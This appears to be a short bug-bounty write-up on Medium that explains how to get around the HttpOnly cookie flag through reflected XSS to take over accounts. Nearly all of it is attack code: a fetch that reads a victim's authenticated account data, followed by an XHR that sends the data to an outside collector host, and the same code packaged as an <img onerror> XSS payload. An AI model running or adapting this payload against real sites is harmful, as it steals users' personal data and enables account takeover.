Defeat the HttpOnly flag to achieve Account Takeover | RXSS

Achieving Account Takeover:

First thing I did is starting to analyze the source code and JS files to look for any ApiKey, Secret token, CSRF token ..etc.

fetch('https://api.target.com/home/v1/UserPersonalization/mymodules?more=true', {
method: 'get',
credentials: 'include',
headers: {
'Content-Type': 'application/json'
}
}).then(response => response.text());
.then(data => {
var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://timooon.free.beeceptor.com/data');
xhr.send(data);
});
<img src onerror="fetch('https://api.target.com/home/v1/UserPersonalization/mymodules?more=true', {
method: 'get',
credentials: 'include',
headers: {
'Content-Type': 'application/json'
}
}).then(response => response.text()).then(data => {
var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://timooon.free.beeceptor.com/data');
xhr.send(data);
});">

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mohamed Tarek

Mohamed Tarek

Engineering Student | Bug Hunter | Penetration tester | CTF Player